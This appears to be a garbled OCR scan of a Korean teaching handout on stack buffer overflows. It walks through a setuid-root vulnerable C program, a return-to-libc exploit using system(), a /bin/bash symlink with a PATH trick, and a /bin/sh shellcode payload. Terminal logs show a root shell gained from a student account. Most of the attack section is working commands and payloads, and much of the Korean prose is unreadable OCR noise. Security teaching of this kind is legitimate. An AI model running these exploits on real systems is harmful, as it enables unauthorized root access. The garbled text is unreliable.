#gcc-ovulnvuln.c (0] BHES root o2 ASHGHELICE)
# chmod +s vuln

# Is -al vuln

-rwsr-sr-x 1 root root 11988 Aug 9 23:57 vuln

A o] =2 WS FAN FAIT!

F FE4A(root shel)& d5s|H= AYY
| A5 H-9, A E3HQI studentol| A Z ]2 root® “HH A
To] EJHA A|ARIS] E A-E THE 4= QA FY T




HA LHEL -2 1A TR
@I Ed 2|02zt Hs “root"E ElS5t2t

A, 21 w4 YR Th

[m]A]

9 HeF 22 IS o] 85l 4] root A S EA Q!

root @] Mo} E AAJSEAL, root shell& E5aHH -5 AY
2701 Auk AlA el student/student2 kA oF ST},

L

[BIG Q1 E ]

ofl Lz Igo] B ol BT AT A9, 1 B etoluelelst Agsh B
£ o] dmele] Geighc.

=, A4 AgEE §4E 910 o B @45ol Hlme ojdste] 9145k A By
.

[BIG RIE-2]

Redhat 6.20]] 7]20=2 A2|=]o] Q= /bin/bash= & AWME] JHH E4+E2}
(ex. Oxfh 5= Atz #2|skA] Fot= M7t 5 UH.

OB R WI7F A H /bin/bash2E AHESHAI A AU

$ /bin/bash -version
GNU bash, version 1.14.7(1)

$ /bin/bash2 -version
GNU bash, version 2.03.8(1)-release (i386-redhat-linux-gnu)
Copyright 1998 Free Software Foundation, Inc.

$
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HA LHEL -2 1A TR

Section 24

Jvuln.c

int main(int argc, char *argv[])

{
char buffer[80];

/] =20 QIZ} 20l

if(argc € 2)

{
printf(“argument errorn”);
exit(-1);

}

/] ZEHO| 2 Ay QIZLE 2| #M4 buffer=2 SA}
strcpy(buffer, argv[1]);

/| SAEHWE &
printf(“your input is %s#n”, buffer);

# gcc -o vuln vuln.c

# chmod +s vuln

#Is -al vuln

-rwsr-sr-x 1 root root 11988 Aug 9 23:57 vuln
#
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il
filo
ok
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S|=
=

o714 BAE el ol F
uet,

A 72 LgE o] ZAE &7 Y5 ZE2A AV} 7IA T Q= A Wne s 1
HLA, o]E Foll ZE I, HiolH 94, 9 94, o 2telBee g, 281
28 golte Aol EATS &7 HASH .

ol shubat gl AL obguc,
wlme] Qo] EAfsks R4 gol8E Fol root A B0 B4

27l fZdyc.

L~

% Sl A

=
A=

o
pu—

rr

o] w, $-219] sloj2 T 7]AHe the} 2E ofelt|o} S WaelA Huith

I el A2 o2
system()d-45 &
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HA ilhi’s_/—‘i,l"ll% ()
€2’24§%mmgﬁﬂ§ o Mgt

ol Al olai7} 7PAILa?

9o A Wze) Gol F g4 eolnelelst ZAE doky, a2l o
AA) AL FHE AolE B4 ol Belelst RSk g RE g4E0] BA2
w|melo] gehehs A 2 Qg

Jeing 4 9 AR 7FssH S sysem( @4 e ofgzte] 145
S AU o] B5E T oot St Aot BE FIL AFT 5 A H

HEZ root @Rto 2 WY}

o]A AA vuln T2 1S Teksle R4S Hojs g AL )
o2 2. ofef 4L welslH A M1 QWEee FA giFt 72 oA vy
o},

$

$ /bin/bash2

$

$ export PATH=$PATH:,
$

$ cat > addr_of_system.c
#include <dlIfcn.h)

int main()

{
long addr;
void *handle;

handle = dlopen(“/lib/libc.s0.6”, RTLD_LAZY);

addr = (long)disym(handle, “system”);
printf(“system() is at 0x%x¥n”, addr);

)
(HEY+D 22)



w seia-siiii | RN
2022 v vzl 2e|@Q

$

$ gcc -0 ./addr_of_system addr_of_system.c -Ic -IdI

$ ./addr_of_system

system() is at 0x40058ae0

$

$ ./vuln “perl -e ‘printf “A”x84 . “Wxe0Wx8aWx05Wx40™"

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@

sh: 1€ &?? command not found

Segmentation fault

$

$ ./vuln “perl -e ‘printf “A”x84 . “Wxe0Wx8aWx05Wx40”" 2> output

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
Segmentation fault

$

$ xxd output

0000000: 7368 3a20 f4fb ffbf fbfb ffbf 3220 636f sh: ........ 1 Co

0000010: 6d6d 616e 6420 6e6f 7420 666f 756e 640a mmand not found.
$

$ In -s /bin/bash “perl -e ‘printf “Wxf4wxfowxffwxbfwxfbwxfbwxffwxbf”
* 0| 1 0] gf2 HlstAo) dhef Hatd 4~ el 2 B0 QB Cf

* Q2 xxd @ Z1H0|M 32202+ 3a202| ALO] ZH2 =S AIL|CH

$

$ ./vuln “perl -e ‘printf “A”x84 . “Wxe0Wx8aWx05Wx40""

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@

#

#id

uid=500(student) gid=500(student) euid=0(root) egid=0(root)
groups=500(student)

# whoami

root

#
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dal
4ol

L

o2l matstrof A-55te] root e BS54 BREHY
olA] oJ® Y& Q13 root o] YEH ANA] FHo] oA AYztsf BAITh

ol wj, o2} o] & olslistal Hojrtor & AE2 vt ZsUH

B2 A bash2E AW ol RAYNY
.export O 7 PATH $4H4+E $43 o] 47
-system() @2] Fa o B ok

CAE 84707 Y& o]l g Rl R

T
ABe W28 Ae ol4e BASe] AL

N AW N =

o e B A2 A7FS E217] 19 olo] ek I 2 B4 3 A dEe ohe
B A S AU




HiA LHEL -k
@\ IZSEE’E4 HIj LHS229 F (JM 298)

SEC—tLOM 1?

.rl--.'- Edlel %7 (4 FAq

-

A A7) A= A W shpshbd BAe) BRES st

$ /bin/bash2

7120 2 A= /bin/bash®E Tt =2 HH Q1 /bin/bash2E A dYst= F-EUYTH.

< 9 bashe Wxff 59 Aoz ST & Qe £4s& Adlz AsHA]
StE HI7F o7] eyt

Y AL

A 348 B Wxff, Wxbfe} 22 BEARES AFRSt= BHo| Lo, 1 BRS
1ol A = 2] bash2E A3t APt

0 of

dlE 5] 7|2 bash AEjol A cat » ‘perl —e ‘printf “WxfaWxfbWxffWxbfWx01W
xfcWxffWxbf™ 4 W& Ad8sHHA, ol AAH “WxfaWxfbWxffWxbfWx01W
xfcWfWxbf 2t 0] 52] 1t thAl JF3t o] 52] “WxbfWxfaWxfb™gh= o] &2
o] A== AlYgyr

31219 redhat 7.0 olAFe.2 2e7HEl o] BAIL © o)A MAsA] Lo B bash2S
A} gobe HY e

I v 22 @7H s PATHO @A B 2E F71ske F-2<0d, olof tisid ==
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25 22 I QHEZ220| ATt (A AH I
$ export PATH=$PATH:.
7 ohge) B ofefet 2,

$ cat > addr_of_system.c
#include <dlfcn.h>

int main()

{
long addr;
void *handle;

handle = dlopen(“/lib/libc.s0.6”, RTLD_LAZY);
addr = (long)dlsym(handle, “system”);
printf(“system() is at Ox%x#n”, addr);

$ gcc -o ./addr_of_system addr_of_system.c -Ic -IdI
$ ./addr_of_system
system() is at 0x40058ae0

$
ol Tt =L Y9 o=z AR system() o0 FAE = W AY

ot

AA "7t GO mEe T4 gL SRl R T)” Ao A Ff gtol B2 o Hof oS
Agsh of yghd F=ol7| = gt ZE5 HAH, dlopen() 42 E4 T4 gho]
Hejg] npdS 29 & dlsym() g Foll Yol & FAE ol d &
UsHTh (gecd] ~le2t -1dl Aol tisfiA & o] Ao A= o] 51Tt

o] Z&E Hutd 3t 5 APSIH system() F7F 0x40058ae0 F40f f1A]5tAL Q=

(o]
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Wi LB -tk ey
@IZSEQQ ST QU ERPO| Y (MM HY)
71—

H]E}

2 WAOR system() o] £48 Jobd 4 el
22 oA A2 system() T FAE o EY AR

N’

01 REdydh

rlr

$ ./vuln “perl -e ‘printf “A”x84 . “Wxe0Wx8awx05W%Wx40™"

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@

shilfE r& ?? command not found

Segmentation fault

$

system() 9] 47} 0x40058ae00] B2, o] & v a]of B-& wf3ll little endian
Ao gFZo] 7] T 2 (Wxe0Wx8aWx05Wx40) Hol& Aol folghytt.

=, 7] ¥4 0uto] E0} SFP 4utol 2 T8 84715 WA A$Iok 1 Thg 4utol =7}
2 olzeas 98 4 9l H AU

= HW, “sh: #r2?? command not found = FHo] Hol

go2 2H o] AE system() T2 HHLGLS of YEhE=E @A)

Pu k. ghef o] Fgo] & ofsj7} =] 2] oF=thH Aof abcgh= —4‘3]%}\% HgS et
Aol A Hyr

$ abc
bash: abc: command not found

$

o147 EASHA

3= 8-S 4885t command not foundzh= o 2]H A 2|7} &
Ax= AT FLe AU
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25 27 um ewzzo0 ue (i 2o [
A

TR 7] 4 BAE 9217} system( F52 oW A0 AAE UAZ =
o] gtk AU

fllo
1o
=
_O‘L
rlr

A& 59 system(“Is —al”)©|t}, system(“/bin/bash”) ¢} Zo] A= ]
JNAE A F2] k5T

S-el= 2] 2| o]EY A0 FAE system() ] FAR HE Zlo] HEUTH

(¢}

18 A9 g9 o]ug A M2 Qo) A 0 & AP system() T4e AH o]
7ol ZH41 2] Q1A Qlekar 27k

QL
R
mkﬂ
L,
_u

0 A 25k A7} ok Aol AgEle] QIR EE gkl 1A kg A1g ]
7] wlizoll flofl Hol= #3877 "oF 22 JF ALl
Yk,

o] YT/ FAE2 FA o229 28 &R0 w2 A yehd 4 9l
ol eyt 28 EXistE A9l gho] A= A 0]7] EHL%ME}.

0oz & A2 JEF TAEY " rE?? " FLY o] 5 A ol st
1
-

4
PUFSHHA “ 1 (=227 "t o] S9] u}do] §197] W&o command not found
A7t S EH YA G g2 “ i 727 "2k o] 59 ntdo] AT F -

o] = AP Fo]7] Y2t
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$

$ ./vuln “perl -e ‘printf “A’x84 . “Wxe0Wx8aWx05Wx40™ 2> output

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
Segmentation fault

$

$ xxd output

0000000: 7368 3a20 f4fb ffbf fofb ffbf 3a20 636f sh: ........ o)

0000010: 6d6d 616e 6420 6e6f 7420 666f 756e 640a mmand not found.
$

$ In -s /bin/bash “perl -e ‘printf “Wxf4WxfoWxffwxbfwxfbwxfbwxffwxbf™
$

Ao Al FE2 " 2?7 Tehe ol S s I AU

24 “sh: # & ?? command not found”2h= o8] WA & ZFo2 2rto]=l A

°]-83te] outputolehe o] 5] w2 AL,
T theell xxd HHE 0] 83sto] o] Y&e 16352 Selsh)

ol * i (7779 2L W B o] A4 oW 52 TAE] QA Aotel
7 &rls}7] gt

bash: abc: command not found

$

B, 5 A B 215 AR o] L g el £} sl g A1
ofel, 5 Wiz “:" ] w9 who| E7} §Ro] BYS & 4 AUt
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HiA ilhz’s_/—‘i,l-ql%u_zi
25.2Z HI] QHER Q9| HE (MM AT I

o|E Ed= ¢t 1674 @l Al 24,

$ xxd output
0000000: 7368 3a20 f4fb ffbf fbfb ffbf 3a20 636f sh: ........ 1 co
0000010: 6d6d 616e 6420 6e6f 7420 666f 756e 640a mmand not found.

$

A 9 %] 3a20( )9 v kg vo] E< {47} aplg o] Alzfolu], T thE 3a()]
U} 9 ulol EQ1 b7 MY BYS & 4 e

o14] o] HRE ol ste] sgah nelyS BHEI
$ In -s /bin/bash “perl -e ‘printf “Wxf4wxfoWwxffwxbfWxfbWwxfbwxffwxbf™

o wd-g e B2 2 vty gecz Al Tl Ao LSt HL
™
o

/bin/bash® AZAA| 71 0]-§ system() st=o]] o]5] o] It go] Al = o
/bin/bash7} AP =] A 5}7] _,4 srelyrct,

system() = FE Agto g A = AojnZ o] W APH /bin/bash §
Al FE Aol A AUt 181 /bin/bashts= ARt exit BP0 2 A&
TEY Q7HA] ALHA FEe 7] diZol, A ZEIHS TrEA &L
A< root WSHo 2 A Ayt

et

o]

AP =AU

i

o
T

oA o] AlollA A5 PATH 87 ®fi4E 74

$ export PATH=$PATH:.
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#HiA LHELS-Sha1L T
@IZSE% HI QHEZ220| HEF (AM| AT)

o]

ol§-2 olafstelE thet 22 AW HBAE Puek

$ cat > hello.c <- hello.c2t= THY 44
int main()
{
printf(“hellown”);
}
(CTRL+D &)
$ gcc -o hello hello.c - Ao
$
$ hello
bash: hello: command not found <- e Aoy
$
$ export PATH=$PATH:. <- StEHL0| 2| = 27}
$
$ hello
hello -l d3

$

Lol o TS AN u, AA (A BN 94 A1) S

FAAR@A EAE ANEom A4 A%) FA0E B Bt

-] 9= 7F Asgst Aot i
Y 7] wigof Aegel HufstA g

?? T AU R AR, R A of
.

ﬁ
LIII\_O

Y
T 28 90l A% =7 g 2oll, PATH &7 W45 578
=

7} H“Pﬂ HU

A system() ol oo A== FF I HE A2 =2 viHA Yot



-
1

HiA ilﬁ%}_%—i‘"’l [

2527 ¥ U B2 20| YT (MA 4% |

1% 7] 2o PATH 3
Ayt

oAl E EHI7F B AHAM Aol 4 S oA Ay

o
rE
>
il
ol
b
o]
o)
i
X,
N
_|_l
i
P
rﬂ:
2
>
o
flo
3
ro

$ ./vuln ‘perl -e ‘printf “A”x84 . “Wxe0Wx8aWwx05Wx40™"

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA? @

#

olA B8l o= Ak system() T2] 41 0x40058ae0L.2 HIA| =], A H

off A7E]o] QlE Aejo] Fre arste] i’ 27 T WS Agsteial shA Huyh
ol mf 2|7} “ # (& ?? "2t TS o5 wdS v YA 1, X HRE
PATH 3t W4=o] 718l Eqton 2 “ i (R 2? " mpdo] gz o= Adgyct

T3 82?7 T /bin/bash LR P37} Hojglon g A bash7t A
Y},

#id
uid=500(student) gid=500(student) euid=0(root) egid=0(root)
groups=500(student)

# whoami
root
#
ol A Hawe) 2 A roor & S5 HdLL Tt

1=

root ] setuid7} A H 2T M e MER-S FFHS o] 8sto] At A

ol 4t AdY .

ol7io] vtz v QMZR$ Hopdg olgot] Aut ALgA AL 21 Bzl
“root” 2 BEE 54|71 AurE Yt
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oM FoF RO A4 FEE ThA] FHH BAGUTH

i

int main(int argc, char *argv([])

{
char buffer[80];

[/ T2 01zt &Hol
if(argc < 2)
{

printf(“argument errorn”);
exit(-1);
}

[/ Z2H0| 2 WA QIALE XY B4~ buffer2 SAt
strcpy(buffer, argv[1]);

[l SAHE WE =24

printf(“your input is %sw#n”, buffer);

o
o
)
Ho
)
N
N,
inss
w
ot

o] & strepy(buffer, argv[1]); F&
buffer Bl H452 EAFE YT

Jvuln.c
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26.#3E (Shellcode)E 0|8t 54 ALY I @

$ ./vuln “perl -e ‘printf “Wx90Wx90Wx90Wx90
Wx90Wx90WXx90Wx90WXx90WxI0WXx90Wx90WXx90Wx90WXx90WxO0WXx90W
x90WXx90Wx90Wx90Wx90WXx90Wx90WXx90WxXxO0WXxI0WXxO0WXI0W X3 1W
XCOWXbOWX46¥W X3 1 Wxdbix3 1#WXxcOWxcdWx80WxebwWx 1w x5ex89wW

X7 6\ X08¥ X3 1 WXCOWX88 X461 X0 7 Wx8IW X461 X0 XbOW xOb Wx89
xf3Wx8dWx4eWx08Wx8dWx56W X0 xcdWx80Wx3 1 xdbWx89Wxd8
x40¥xcdwx80W xe8wxdcwxffwxffwxff/bin/shwx58Wxfawxffwxbf™”

ZH2IV
212?22 /bin/shX?
bash#
bash# whoami
root
bash#

L TSl =0 ya o7 oot @ol 5] AL}
=&, o] g

HoF L2 I30] A2 Soizt o] ol 34 etolneld et nhrtA R 5
8gikol = QL.

o] % grel sutol £} g AHERA, T U

Wx90Wx90WXx90Wx90WXx90Wx90WXx90Wx90WXx90Wx90WXx90WxO0WXx90W
x90WXx90Wx90Wx90Wx90WXx90Wx90WXx90Wx90Wx90Wx90WXx90W xO0W
X90¥Xx90WXx90W x3 1WxXCOWXDOWX46W X3 1 xdb X3 TWXCOW XcdWx80 W
xebWx 1 x5eWx89Wx7 6 W X08%W X3 1 XCOWX88WxXA6W X0 7 W X8O W x46W
XOCcWXbOWXObWx89W xf3Wx8d W x4eWx08 W x8dWx56WxOcWxcd Wx80
x3 1 xdb¥Wx89Wxd8 W x40 W xcdWx80Wxe8Wxdcw xffwxffwxff/bin/sh

ol “/bin/sh& Astet = FH 2 7HAL = 7149l ZEYYH.
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